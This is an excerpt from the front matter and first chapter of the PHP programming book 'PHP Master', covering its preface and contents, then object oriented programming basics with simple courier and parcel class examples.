Fixed-size Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Stacks and Queues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Heaps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
Priority Queues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
xviii
Appendix C
Next Steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
Keep Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
Attending Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
User Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Online Communities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Open Source Projects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
359
Preface
PHP Master is aimed at intermediate PHP developers—those who have left their
newbie status behind, and are looking to advance their skills and knowledge. Our
aim as authors is to enable developers to refine their skills across a number of areas,
and so we’ve picked topics that we felt have stood us in the best stead to grow as
developers and progress our skills and careers.
It’s expected that you’ll already be working with at least some of the topics we
cover; however, even topics that may already be familiar to you are recommended
reading. PHP, perhaps more than many other languages, seems to attract people
from different walks of life. There’s no sense of discrimination against those with
no formal education in computing or in web development specifically. So while
you may be actively using several techniques laid out here, dipping in to the chapters
that follow could reveal new approaches, or illustrate some underlying theory that’s
new to you. It is possible to go a long way with the tricks you pick up in your dayto-day work, but if you’re looking to cement those skills and gain a more solid
footing, you’re in the right place.
This book will assist you in making that leap from competent web developer to
confident software engineer—one who uses best practice, and gets the job done reliably and quickly. Because we’re writing PHP as a way to make a living, just like
many of you do, we use a “how to” approach. The aim is to give you practical,
useful advice with real examples as you move through the sections of the book.
Whatever path brought you here, we hope you find what you’re looking for, and
wish you the best of everything as you travel onwards.
Who Should Read This Book
As stated, PHP Master is written for the intermediate developer. This means you
should have a solid grounding in the fundamentals of PHP—the syntax underpinning
the code, how functions and variables operate, constructs like foreach loops and
if/else statements, and how server-side scripts interact with client-side markup
(with HTML forms, for instance). We won’t be rehashing the basics—although
there’ll be plenty of references to concepts you should already be familiar with, and
xx
you’ll be learning new ways to improve upon your existing techniques of generating
server-side applications.
We’re going to work to an object oriented programming game plan—and if that’s a
term you’ve heard mentioned before, you’ll certainly be hearing a lot more of it as
you progress through this book! OOP, as it’s commonly known, is a standard to
which good PHP developers adhere to ensure compliance with best practice, and
to make their code work as efficiently as possible. You’ll learn how to use OOP to
your advantage—creating classes, instantiating objects, and tightening your coding
processes, generating some handy templates for future projects en route. If you’re
already familiar with OOP, the opening chapter will serve as an excellent refresher,
and if not, make sure you start right from the beginning to gain the most from
reading PHP Master.
In addition, we’ll be working with databases—a key mode of storage for web applications. A basic understanding of what databases are and how they work will help
you along, but we’ll be covering ways of connecting to them in great depth, as well
as stepping through the world of MySQL—the most popular query language used
to interact with information in a database.
Finally, this book will tackle some nifty approaches to refining, testing, and deploying your code. While these concepts are somewhat advanced, thorough explanations
will be provided. A familiarity with command line interfaces and their associated
vocabularies will be of assistance in these chapters.
What’s in This Book
This book comprises eight chapters and three appendices. While most chapters
follow on from each other, they each deal with a new topic. You’ll probably gain
the most benefit from reading them in sequence, but you can certainly skip around
if you only need a refresher on a particular subject.
Chapter 1: Object Oriented Programming
We’ll start by discussing what object oriented programming consists of, and
look at how to associate values and functions together in one unit: the object.
Declaring classes and instantiating objects will be covered to start us off on our
OOP journey; then we’ll delve into inheritance, interfaces, and exception
xxi
handling. We’ll have a thorough OOP blueprint to work to by the end of this
chapter.
Chapter 2: Databases
The Web is a dynamic world—gone are the days where users simply sit back
and read web pages. Databases are a key component of interactive server-side
development. In this chapter, we’ll discover how to connect to a database with
the PDO extension, and how to store data and design database schema. In addition, we’ll look at the structured query language MySQL, as well as the commands you need to know to interact with a database.
Chapter 3: APIs
Application Programming Interfaces are a way of transferring data other than
via web page-based methods; they provide the link that a particular service,
application, or module exposes for others to interact with. We’ll look at how to
incorporate them into your system, as well as investigate service-oriented architecture (SOA), HTTP requests and responses, and alternative web services.
Chapter 4: Design Patterns
In the real world, repeated tasks have best practices, and in coding, we call
these design patterns; they help PHP users optimize development and maintenance. In this chapter, we’ll cover a wide range of design patterns, including
singletons, factories, iterators, and observers. We’ll also take a tour of the MVC
(Model-View-Controller) architecture that underpins a well-structured application.
Chapter 5: Security
All technologies have some level of capability for misuse in the hands of those
with ill intentions, and every good programmer must know the best techniques
for making their systems as secure as possible—after all, your clients will demand
it. In this chapter, we’ll cover a broad range of known attack vectors—including
cross-site scripting, session hijacking, and SQL injection—and how to protect
your application from malicious entry. We’ll learn how to hash passwords and
repel brute force attacks, as well as dissect the PHP mantra: “filter input, escape
output.”
xxii
Chapter 6: Performance
The bigger your application becomes, the greater the need to test its performance
capabilities. Here we’ll learn how to “stress test” our code using tools like
ApacheBench and JMeter, the best way of optimizing our server configuration,
and cover strategies for streamlining file systems and profiling your code’s actions.
Chapter 7: Automated Testing
As the functionality of an application changes, so does its definition of correct
behavior. The purpose of automated testing is to assure that your application’s
intended behavior and its actual behavior are consistent. In this chapter, we’ll
learn how to target specific facets of your application with unit testing, database
testing, systems testing, and load testing.
Chapter 8: Quality Assurance
Of course, all the hard work you’ve put into creating your application shouldn’t
go to waste; you want your project to be of a high standard. In this chapter, we’ll
look at measuring quality with static analysis tools, resources you can use to
maintain best-practice coding standards and perfect your documentation, and
robust methods of deploying your project on the Web.
Appendix A: PEAR and PECL
So many of the tools we refer to reside in the PEAR and PECL repositories, and
yet we’ve met plenty of PHP developers who are yet to use them. In this appendix, we provide full instructions for setting these up, so there’s no longer
an excuse for being ignorant of the jewels within.
Appendix B: SPL: The Standard PHP Library
The Standard PHP Library is a fabulous and under-celebrated extension that
ships as standard with PHP and contains some very powerful tools to include
in your application. This is especially worth a read as a follow-on to the OOP
and Design Patterns chapters.
Appendix C: Next Steps
Where to from here? A good PHP developer never stops improving their skill
set, and here you’ll find a handy list of resources, from community groups to
conferences.
xxiii
Where to Find Help
SitePoint has a thriving community of web designers and developers ready and
waiting to help you out if you run into trouble. We also maintain a list of known
errata for the book, which you can consult for the latest updates.
The SitePoint Forums
The SitePoint Forums1 are discussion forums where you can ask questions about
anything related to web development. You may, of course, answer questions too.
That’s how a forum site works—some people ask, some people answer, and most
people do a bit of both. Sharing your knowledge benefits others and strengthens
the community. A lot of interesting and experienced web designers and developers
hang out there. It’s a good way to learn new stuff, have questions answered in a
hurry, and generally have a blast.
The Book’s Website
Located at http://www.sitepoint.com/books/phppro/, the website that supports this
book will give you access to the following facilities:
The Code Archive
As you progress through this book, you’ll note a number of references to the code
archive. This is a downloadable ZIP archive that contains the example source code
printed in this book. If you want to cheat (or save yourself from carpal tunnel syndrome), go ahead and download the archive.2
Updates and Errata
No book is perfect, and we expect that watchful readers will be able to spot at least
one or two mistakes before the end of this one. The Errata page3 on the book’s
website will always have the latest information about known typographical and
code errors.
1
http://www.sitepoint.com/forums/
http://www.sitepoint.com/books/phppro/code.php
3
http://www.sitepoint.com/books/phppro/errata.php
2
xxiv
The SitePoint Newsletters
In addition to books like this one, SitePoint publishes free email newsletters, such
as the SitePoint Tech Times, SitePoint Tribune, and SitePoint Design View, to name
a few. In them, you’ll read about the latest news, product releases, trends, tips, and
techniques for all aspects of web development. Sign up to one or more SitePoint
newsletters at http://www.sitepoint.com/newsletter/.
The SitePoint Podcast
Join the SitePoint Podcast team for news, interviews, opinion, and fresh thinking
for web developers and designers. We discuss the latest web industry topics, present
guest speakers, and interview some of the best minds in the industry. You can catch
up on the latest and previous podcasts at http://www.sitepoint.com/podcast/, or
subscribe via iTunes.
Your Feedback
If you’re unable to find an answer through the forums, or if you wish to contact us
for any other reason, the best place to write is books@sitepoint.com. We have a
well-staffed email support system set up to track your inquiries, and if our support
team members can’t answer your question, they’ll send it straight to us. Suggestions
for improvements, as well as notices of any mistakes you may find, are especially
welcome.
Acknowledgments
Lorna Mitchell
I’d like to say a big thank you to the friends who told me to stop talking about
writing a book, and just write one. I’d also like to thank those who tricked me into
realizing that I could write, even though I thought I was a software developer. The
team at SitePoint were wonderful, not just with the words that I wrote but also with
getting me through the writing process, as I was a complete newbie! And last but
very definitely not least, my co-authors, whom I’m proud to call friends, and who
shared this experience with me—rock stars, both of you.
xxv
Davey Shafik
First and foremost, I want to say a big thank you to my wife, Frances, for putting
up with the late nights and lost weekends that went into this book. I’d also like to
thank my very talented co-authors, who I’m fortunate to be able to consider great
friends. Thank you to the great team at SitePoint for their efforts in putting together
this great book. Finally, thank you to you, the reader, for taking the time to read this
book; I hope it not only answers some questions, but opens your mind to many
more to come.
Matthew Turland
I found PHP in 2002, and later its community around 2006. I came for the technology,
but stayed for the people. It’s been one of the best communities I’ve found in my
time as a software developer and I’m privileged to be a part of it. Thanks to everyone
who’s shared in that experience with me, especially those who have befriended and
guided me over the years. Thanks to my spectacular co-authors, Lorna and Davey;
I could not have asked for better partners in this project, nor better friends with
which to share it. Thanks to the excellent SitePoint team of Kelly Steele, Tom
Museth, Sarah Hawk, and Lisa Lang, who helped bring us and the pieces of this
project together to produce the polished book that you see now. Thanks also to our
reviewer Luke Cawood, and my friends Paddy Foran and Mark Harris, all of whom
provided feedback on the book as it was being written. Finally, thanks to you, the
reader; I hope you enjoy this book and that it helps to bring you forward with PHP.
Conventions Used in This Book
You’ll notice that we’ve used certain typographic and layout styles throughout the
book to signify different types of information. Firstly, because this is a book about
PHP, we’ve dispensed with the opening and closing tags (<?php and ?>) in most
code examples and assumed you’ll have them inserted in your own files. The only
exception is where PHP is printed alongside, say, XML or HTML.
Look out for the following items:
Code Samples
Code in this book will be displayed using a fixed-width font, like so:
xxvi
class Courier { public function __construct($name) {
$this->name = $name; return true; } }
If the code is to be found in the book’s code archive, the name of the file will appear
at the top of the program listing, like this:
example.php
function __autoload($classname) { include
strtolower($classname) . '.php'; }
If only part of the file is displayed, this is indicated by the word excerpt:
example.php (excerpt)
$mono = new Courier('Monospace
Delivery');
If additional code is to be inserted into an existing example, the new code will be
displayed in bold:
function animate() { new_variable =
"Hello"; }
Where existing code is required for context, rather than repeat all the code, a vertical
ellipsis will be displayed:
function animate() { ⋮ return
new_variable; }
Some lines of code are intended to be entered on one line, but we’ve had to wrap
them because of page constraints. A ➥ indicates a line break that exists for formatting
purposes only, and should be ignored:
URL.open("http://www.sitepoint.com/blogs/2007/05/28/user-style-she
➥ets-come-of-age/");
xxvii
Tips, Notes, and Warnings
Hey, You!
Tips will give you helpful little pointers.
Ahem, Excuse Me …
Notes are useful asides that are related—but not critical—to the topic at hand.
Think of them as extra tidbits of information.
Make Sure You Always …
… pay attention to these important points.
Watch Out!
Warnings will highlight any gotchas that are likely to trip you up along the way.
Chapter
1
Object Oriented Programming
In this chapter, we’ll be taking a look at object oriented programming, or OOP.
Whether you’ve used OOP before in PHP or not, this chapter will show you what
it is, how it’s used, and why you might want to use objects rather than plain functions
and variables. We’ll cover everything from the “this is how you make an object”
basics through to interfaces, exceptions, and magic methods. The object oriented
approach is more conceptual than technical—although there are some long words
used that we’ll define and demystify as we go!
Why OOP?
Since it’s clearly possible to write complex and useful websites using only functions,
you might wonder why taking another step and using OOP techniques is worth the
hassle. The true value of OOP—and the reason why there’s such a strong move towards it in PHP—is encapsulation. This means it allows us to associate values and
functions together in one unit: the object. Instead of having variables with prefixes
so that we know what they relate to, or stored in arrays to keep elements together,
using objects allows us to collect values together, as well as add functionality to
that unit.
2
PHP Master: Write Cutting-edge Code
Vocabulary of OOP
What sometimes puts people off from working with objects is the tendency to use
big words to refer to perfectly ordinary concepts. So to avoid deterring you, we’ll
begin with a short vocabulary list:
class
object
instantiate
method
property
the recipe or blueprint for creating an object
a thing
the action of creating an object from a class
a function that belongs to an object
a variable that belongs to an object
Armed now with your new foreign-language dictionary, let’s move on and look at
some code.
Introduction to OOP
The adventure starts here. We’ll cover the theoretical side, but there will be a good
mix of real code examples too—sometimes it’s much easier to see these ideas in
code!
Declaring a Class
The class is a blueprint—a set of instructions for how to create an object. It isn’t a
real object—it just describes one. In our web applications, we have classes to represent all sorts of entities. Here’s a Courier class that might be used in an ecommerce
application:
chapter_01/simple_class.php
class Courier
{
public $name;
public $home_country;
public function __construct($name) {
$this->name = $name;
return true;
}
public function ship($parcel) {
Object Oriented Programming
// sends the parcel to its destination
return true;
}
}
This shows the class declaration, and we’ll store it in a file called courier.php. This
file-naming method is an important point to remember, and the reason for this will
become clearer as we move on to talk about how to access class definitions when
we need them, in the section called “Object Inheritance”.
The example above shows two properties, $name and $home_country, and two
methods, __construct() and ship(). We declare methods in classes exactly the
same way as we declare functions, so this syntax will be familiar. We can pass in
parameters to the method and return values from the method in the same way we
would when writing a function.
You might also notice a variable called $thisin the example. It’s a special variable
that’s always available inside an object’s scope, and it refers to the current object.
We’ll use it throughout the examples in this chapter to access properties or call
methods from inside an object, so look out for it as you read on.
Class Constructors
The __construct() function has two underscores at the start of its name. In PHP,
two underscores denote a magic method, a method that has a special meaning or
function. We’ll see a number of these in this chapter. The __construct() method
is a special function that’s called when we instantiate an object, and we call this
the constructor.
PHP 4 Constructors
In PHP 4, there were no magic methods. Objects had constructors, and these were
functions that had the same name as the class they were declared in. Although
they’re no longer used when writing modern PHP, you may see this convention
in legacy or PHP 4-compatible code, and PHP 5 does support them.
The constructor is always called when we instantiate an object, and we can use it
to set up and configure the object before we release it for use in the code. The constructor also has a matching magic method called a destructor, which takes the
3
4
PHP Master: Write Cutting-edge Code
method name __destruct() with no arguments. The destructor is called when the
object is destroyed, and allows us to run any shut-down or clean-up tasks this object
needs. Be aware, though, that there’s no guarantee about when the destructor will
be run; it will happen after the object is no longer needed—either because it was
destroyed or because it went out of scope—but only when PHP’s garbage collection
happens.
We’ll see examples of these and other magic methods as we go through the examples
in this chapter. Right now, though, let’s instantiate an object—this will show nicely
what a constructor actually does.
Instantiating an Object
To instantiate—or create—an object, we’ll use the new keyword and give the name
of the class we’d like an object of; then we’ll pass in any parameters expected by
the constructor. To instantiate a courier, we can do this:
require 'courier.php';
$mono = new Courier('Monospace Delivery');
First of all, we require the file that contains the class definition (courier.php), as PHP
will need this to be able to make the object. Then we simply instantiate a new
Courier object, passing in the name parameter that the constructor expects, and
storing the resulting object in $mono. If we inspect our object using var_dump(),
we’ll see:
object(Courier)#1 (2) {
["name"]=>
string(18) "Monospace Delivery"
["home_country"]=>
NULL
}
The var_dump() output tells us:
■ this is an object of class Courier
■ it has two properties
■ the name and value of each property
Object Oriented Programming
Passing in the parameter when we instantiate the object passes that value to the
constructor. In our example, the constructor in Courier simply sets that parameter’s
value to the $name property of the object.
Autoloading
So far, our examples have shown how to declare a class, then include that file from
the place we want to use it. This can grow confusing and complicated quite quickly
in a large application, where different files might need to be included in different
scenarios. Happily, PHP has a feature to make this easier, called autoload. Autoloading is when we tell PHP where to look for our class files when it needs a class declaration that it’s yet to see.
To define the rules for autoloading, we use another magic method: __autoload().
In the earlier example, we included the file, but as an alternative, we could change
our example to have an autoload function:
function __autoload($classname) {
include strtolower($classname) . '.php';
}
Autoloading is only useful if you name and store the files containing your class
definitions in a very predictable way. Our example, so far, has been trivial; our class
files live in same-named, lowercase filenames with a .php extension, so the autoload
function handles this case.
It is possible to make a complex autoloading function if you need one. For example,
many modern applications are built on an MVC (Model-View-Controller—see
Chapter 4 for an in-depth explanation) pattern, and the class definitions for the
models, views, and controllers are often in different directories. To get around this,
you can often have classes with names that indicate the class type, such as
UserController. The autoloading function will then have some string matching or
a regular expression to figure out the kind of a class it’s looking for, and where to
find it.
Using Objects
So far we’ve declared an object, instantiated an object, and talked about autoloading,
but we’re yet to do much object oriented programming. We’ll want to work with
5
6
PHP Master: Write Cutting-edge Code
both properties and methods of the objects we create, so let’s see some example
code for doing exactly that:
$mono = new Courier('Monospace Delivery');
// accessing a property
echo "Courier Name: " . $mono->name;
// calling a method
$mono->ship($parcel);
Here, we use the object operator, which is the hyphen followed by the greater-than
sign: ->. This goes between the object and the property—or method—you want to
access. Methods have parentheses after them, whereas properties do not.
Using Static Properties and Methods
Having shown some examples of using classes, and explained that we instantiate
objects to use them, this next item is quite a shift in concept. As well as instantiating
objects, we can define class properties and methods that are static. A static method
or property is one that can be used without instantiating the object first. In either
case, you mark an element as static by putting the static keyword after public (or
other visibility modifier—more on those later in this chapter). We access them by
using the double colon operator, simply ::.
Scope Resolution Operator
The double colon operator that we use for accessing static properties or methods
in PHP is technically called the scope resolution operator. If there’s a problem
with some code containing ::, you will often see an error message containing
T_PAAMAYIM_NEKUDOTAYIM. This simply refers to the ::, although it looks quite
alarming at first! “Paamayim Nekudotayim” means “two dots, twice” in Hebrew.
A static property is a variable that belongs to the class only, not any object. It is
isolated entirely from any property, even one of the same name in an object of this
class.
A static method is a method that has no need to access any other part of the class.
You can’t refer to $this inside a static method, because no object has been created
to refer to. Static properties are often seen in libraries where the functionality is
Object Oriented Programming
independent of any object properties. It is often used as a kind of namespacing (PHP
didn’t have namespaces until version 5.3; see the section called “Objects and
Namespaces”), and is also useful for a function that retrieves a collection of objects.
We can add a function like that to our Courier class:
chapter_01/Courier.php (excerpt)
class Courier
{
public $name;
public $home_country;
public static function getCouriersByCountry($country) {
// get a list of couriers with their home_country = $country
// create a Courier object for each result
// return an array of the results
return $courier_list;
}
}
To take advantage of the static function, we call it with the :: operator:
// no need to instantiate any object
// find couriers in Spain:
$spanish_couriers = Courier::getCouriersByCountry('Spain');
Methods should be marked as static if you’re going to call them in this way; otherwise, you’ll see an error. This is because a method should be designed to be called
either statically or dynamically, and declared as such. If it has no need to access
$this, it is static, and can be declared and called as shown. If it does, we should
instantiate the object first; thus, it isn’t a static method.
When to use a static method is mainly a point of style. Some libraries or frameworks
use them frequently; whereas others will always have dynamic functions, even
where they wouldn’t strictly be needed.
7
8
PHP Master: Write Cutting-edge Code
Objects and Namespaces
Since PHP 5.3, PHP has had support for namespaces. There are two main aims of
this new feature. The first is to avoid the need for classes with names like
Zend_InfoCard_Xml_Security_Transform_Exception, which at 47 characters long
is inconvenient to have in code (no disrespect to Zend Framework—we just happen
to know it has descriptive names, and picked one at random). The second aim of
the namespaces feature is to provide an easy way to isolate classes and functions
from various libraries. Different frameworks have different strengths, and it’s nice
to be able to pick and choose the best of each to use in our application. Problems
arise, though, when two classes have the same name in different frameworks; we
cannot declare two classes called the same name.
Namespaces allow us to work around this problem by giving classes shorter names,
but with prefixes. Namespaces are declared at the top of a file, and apply to every
class, function, and constant declared in that file. We’ll mostly be looking at the
impact of namespaces on classes, but bear in mind that the principles also apply
to these other items. As an example, we could put our own code in a shipping
namespace:
chapter_01/Courier.php (excerpt)
namespace shipping;
class Courier
{
public $name;
public $home_country;
public static function getCouriersByCountry($country) {
// get a list of couriers with their home_country = $country
// create a Courier object for each result
// return an array of the results
return $courier_list;
}
}
From another file, we can no longer just instantiate a Courier class, because if we
do, PHP will look in the global namespace for it—and it isn’t there. Instead, we refer
to it by its full name: Shipping\Courier.
Object Oriented Programming
This works really well when we’re in the global namespace and all the classes are
in their own tidy little namespaces, but what about when we want to include this
class inside code in another namespace? When this happens, we need to put a
leading namespace operator (that’s a backslash, in other words) in front of the class
name; this indicates that PHP should start looking from the top of the namespace
stack. So to use our namespaced class inside an arbitrary namespace, we can do:
namespace Fred;
$courier = new \shipping\Courier();
To refer to our Courier class, we need to know which namespace we are in; for instance:
■ In the Shipping namespace, it is called Courier.
■ In the global namespace, we can say shipping/Courier.
■ In another namespace, we need to start from the top and refer to it as
\shipping\Courier.
We can declare another Courier class in the Fred namespace—and we can use both
objects in our code without the errors we see when redeclaring the same class in
the top-level namespace. This avoids the problem where you might want to use
elements from two (or more) frameworks, and both have a class named Log.
Namespaces can also be created within namespaces, simply by using the namespace
separator again. How about a site with both a blog and an ecommerce function? It
might have a namespaced class structure, such as:
shop
products
Products
ProductCategories
shipping
Courier
admin
user
User
Our Courier class is now nested two levels deep, so we’d put its class definition
in a file with shop/shipping in the namespace declaration at the top. With all these
9
10
PHP Master: Write Cutting-edge Code
prefixes in place, you might wonder how this helps solve the problem of long class
names; all we seem to have managed so far is to replace the underscores with
namespace operators! In fact, we can use shorthand to refer to our namespaces, including when there are multiple namespaces used in one file.
Take a look at this example, which uses a series of classes from the structure in the
list we just saw:
use shop\shipping;
use admin\user as u;
// which couriers can we use?
$couriers = shipping\Courier::getCouriersByCountry('India');
// look up this user's account and show their name
$user = new u\User();
echo $user->getDisplayName();
We can abbreviate a nested namespace to only use its lowest level, as we have with
shipping, and we can also create nicknames or abbreviations to use, as we have
with user. This is really useful to work around a situation where the most specific
element has the same name as another. You can give them distinctive names in order
to tell them apart.
Namespaces are also increasingly used in autoloading functions. You can easily
imagine how the directory separators and namespace separators can represent one
another. While namespaces are a relatively new addition to PHP, you are sure to
come across them in libraries and frameworks. Now you know how to work with
them effectively.
Object Inheritance
Inheritance is the way that classes relate to each other. Much in the same way that
we inherit biological characteristics from our parents, we can design a class that
inherits from another class (though much more predictably than the passing of curly
hair from father to daughter!).
Classes can inherit from or extend one parent class. Classes are unaware of other
classes inheriting from them, so there are no limits on how many child classes a
Object Oriented Programming
parent class can have. A child class has all the characteristics of its parent class,
and we can add or change any elements that need to be different for the child.
We can take our Courier class as an example, and create child classes for each
Courier that we’ll have in the application. In Figure 1.1, there are two couriers
which inherit from the Courier class, each with their own ship() methods.
Figure 1.1. Class diagram showing the Courier class and specific couriers inheriting from it
The diagram uses UML (Unified Modeling Language) to show the relationship
between the MonotypeDelivery and PigeonPost classes and their parent, the Courier
class. UML is a common technique for modeling class relationships, and you’ll see
it throughout this book and elsewhere when reading documentation for OOP systems.
The boxes are split into three sections: one for the class name, one for its properties,
and the bottom one for its methods. The arrows show the parentage of a class—here,
both MonotypeDelivery and PigeonPost inherit from Courier. In code, the three
classes would be declared as follows:
chapter_01/Courier.php (excerpt)
class Courier
{
public $name;
public $home_country;
public function __construct($name) {
$this->name = $name;
return true;
}
11
12
PHP Master: Write Cutting-edge Code
public function ship($parcel) {
// sends the parcel to its destination
return true;
}
public function calculateShipping($parcel) {
// look up the rate for the destination, we'll invent one
$rate = 1.78;
// calculate the cost
$cost = $rate * $parcel->weight;
return $cost;
}
}
chapter_01/MonotypeDelivery.php (excerpt)
class MonotypeDelivery extends Courier
{
public function ship($parcel) {
// put in box
// send
return true;
}
}
chapter_01/PigeonPost.php (excerpt)
class PigeonPost extends Courier
{
public function ship($parcel) {
// fetch pigeon
// attach parcel
// send
return true;
}
}
The child classes show their parent using the extends keyword. This gives them
everything that was present in the Courier parent class, so they have all the properties and methods it does. Each courier ships in very different ways, so they both
redeclare the ship() method and add their own implementations (pseudo code is
Object Oriented Programming
shown here, but you can use your imagination as to how to actually implement a
pigeon in PHP!).
When a class redeclares a method that was in the parent class, it must use the same
parameters that the parent method did. PHP reads the extends keyword and grabs
a copy of the parent class, and then anything that is changed in the child class essentially overwrites what is there.
Objects and Functions
We’ve made some classes to represent our various courier companies, and seen how
to instantiate objects from class definitions. We’ll now look at how we identify objects and pass them into object methods.
First, we need a target object, so let’s create a Parcel class:
chapter_01/Parcel.php (excerpt)
class Parcel
{
public $weight;
public $destinationAddress;
public $destinationCountry;
}
This class is fairly simple, but then parcels themselves are relatively inanimate, so
perhaps that’s to be expected!
Type Hinting
We can amend our ship() methods to only accept parameters that are Parcel objects
by placing the object name before the parameter:
chapter_01/PigeonPost.php (excerpt)
public function ship(Parcel $parcel) {
// sends the parcel to its destination
return true;
}
This is called type hinting, where we can specify what type of parameters are acceptable for this method—and it works on functions too. You can type hint any
13
14
PHP Master: Write Cutting-edge Code
object name, and you can also type hint for arrays. Since PHP is relaxed about its
data types (it is a dynamically and weakly typed language), there’s no type hinting
for simple types such as strings or numeric types.
Using type hinting allows us to be sure about the kind of object passed in to this
function, and using it means we can make assumptions in our code about the
properties and methods that will be available as a result.\
Polymorphism
Imagine we allowed a user to add couriers to their own list of preferred suppliers.
We could write a function along these lines:
function saveAsPreferredSupplier(Courier $courier) {
// add to list and save
return true;
}
This would work well—but what if we wanted to store a PigeonPost object?
In fact, if we pass a PigeonPost object into this function, PHP will realize that it’s
a child of the Courier object, and the function will accept it. This allows us to use
parent objects for type hinting and pass in children, grandchildren, and even distant
descendants of that object to the function.
This ability to identify both as a PigeonPost object and as a Courier object is called
polymorphism, which literally means “many forms.” Our PigeonPost object will
identify as both its own class and a class that it descends from, and not only when
type hinting. Check out this example that uses the instanceOf operator to check
what kind of object something is:
$courier = new PigeonPost('Local Avian Delivery Ltd');
if($courier instanceOf Courier) {
echo $courier->name . " is a Courier\n";
}
if($courier instanceOf PigeonPost) {
echo $courier->name . " is a PigeonPost\n";
}
Object Oriented Programming
if($courier instanceOf Parcel) {
echo $courier->name . " is a Parcel\n";
}
This code, when run, gives the following output:
Local Avian Delivery Ltd is a Courier
Local Avian Delivery Ltd is a PigeonPost
Exactly as it does when we type hint, the PigeonPost object claims to be both a
PigeonPost and a Courier. It is not, however, a Parcel.
Objects and References
When we work with objects, it’s important to avoid tripping up on the fact that they
behave very differently from the simpler variable types. Most data types are copyon-write, which means that when we do $a = $b, we end up with two independent
variables containing the same value.
For objects, this works completely differently. What would you expect from the
following code?
$box1 = new Parcel();
$box1->destinationCountry = 'Denmark';
$box2 = $box1;
$box2->destinationCountry = 'Brazil';
echo 'Parcels need to ship to: '
. $box1->destinationCountry . ' and '
. $box2->destinationCountry;
Have a think about that for a moment.
In fact, the output is:
Parcels need to ship to: Brazil and Brazil
What happens here is that when we assign $box1 to $box2, the contents of $box1
aren’t copied. Instead, PHP just gives us $box2 as another way to refer to the same
object. This is called a reference.
15
16
PHP Master: Write Cutting-edge Code
We can tell whether two objects have the same class and properties by comparing
them with ==, as shown below:
if($box1 == $box2) echo 'equivalent';
We can take this a step further, and distinguish whether they are references to the
original object, by using the === operator in the same way:
if($box1 === $box2) echo 'exact same object!';
The === comparison will only return true when both variables are pointing to the
same value. If the objects are identical, but stored in different locations, this operation
will return false. This can help us hugely in identifying which objects are linked
to one another, and which are not.
Passing Objects as Function Parameters
Continuing on from where we left off about references, we must bear in mind that
objects are always passed by reference. This means that when you pass an object
into a function, the function operates on that same object, and if it is changed inside
the function, that change is reflected outside. This is an extension of the same behavior we see when we assign an object to a new variable.
Objects always behave this way—they will provide a reference to the original object
rather than produce a copy of themselves, which can lead to surprising results!
Take a look at this code example:
$courier = new PigeonPost('Avian Delivery Ltd');
$other_courier = $courier;
$other_courier->name = 'Pigeon Post';
echo $courier->name; // outputs "Pigeon Post"
It’s important to understand this so that our expectations line up with PHP’s behavior; objects will give a reference to themselves, rather than make a copy. This means
that if a function operates on an object that was passed in, there’s no need for us to
return it from the function. The change will be reflected in the original copy of the
object too.
Object Oriented Programming
If a separate copy of an existing object is needed, we can create one by using the
clone keyword. Here’s an adapted version of the previous code, to copy the object
rather than refer to it:
$courier = new PigeonPost('Avian Delivery Ltd');
$other_courier = clone $courier;
$other_courier->name = 'Pigeon Post';
echo $courier->name; // outputs "Avian Delivery Ltd"
The clone keyword causes a new object to be created of the same class, and with
all the same properties, as the original object. There’s no link between these two
objects, and you can safely change one or the other in isolation.
Shallow Object Copies
When you clone an object, any objects stored in properties within it will be references rather than copies. As a result, you need to be careful when dealing with
complex object oriented applications.
PHP has a magic method which, if declared in the object, is called when the object
is copied. This is the __clone() method, and you can declare and use this to dictate
what happens when the object is copied, or even disallow copying.
Fluent Interfaces
At this point, we know that objects are always passed by reference, which means
that we don’t need to return an object from a method in order to observe its changes.
However, if we do return $this from a method, we can build a fluent interface into
our application, which will enable you to chain methods together. It works like
this:
1. Create an object.
2. Call a method on the object.
3. Receive the amended object returned by the method.
4. Optionally return to step 2.
This might be clearer to show with an example, so here’s one using the Parcel class:
17
18
PHP Master: Write Cutting-edge Code
chapter_01/Parcel.php
class Parcel
{
protected $weight;
protected $destinationCountry;
public function setWeight($weight) {
echo "weight set to: " . $weight . "\n";
$this->weight = $weight;
return $this;
}
public function setCountry($country) {
echo "destination country is: " . $country . "\n";
$this->destinationCountry = $country;
return $this;
}
}
$myparcel = new Parcel();
$myparcel->setWeight(5)->setCountry('Peru');
What’s key here is that we can perform these multiple calls all on one line (potentially with some newlines for readability), and in any order. Since each method returns the resulting object, we can then call the next method on that, and so on. You
may see this pattern in a number of settings, and now you can also build it into
your own applications, if appropriate.
public, private, and protected
In the examples presented in this chapter, we’ve used the public keyword before
all our methods and properties. This means that these methods and properties can
be read and written from outside of the class. public is an access modifier, and
there are two alternatives: private and protected. Let’s look at them in turn.
public
This is the default behavior if you see code that omits this access modifier. It’s good
practice, though, to include the public keyword, even though the behavior is the
same without it. As well as there being no guarantees the default won’t change in
Object Oriented Programming
the future, it shows that the developer made a conscious choice to expose this
method or property.
private
Making a method or property private means that it will only be visible from inside
the class in which it’s declared. If you try to access it from outside, you’ll see an
error. A good example would be to add a method that fetches the shipping rate for
a given country to our Courier class definition from earlier in the chapter. This is
only needed inside the function as a helper to calculate the shipping, so we can
make it private:
chapter_01/Courier.php (excerpt)
class Courier
{
public function calculateShipping(Parcel $parcel) {
// look up the rate for the destination
$rate = $this->getShippingRateForCountry($parcel->➥
destinationCountry);
// calculate the cost
$cost = $rate * $parcel->weight;
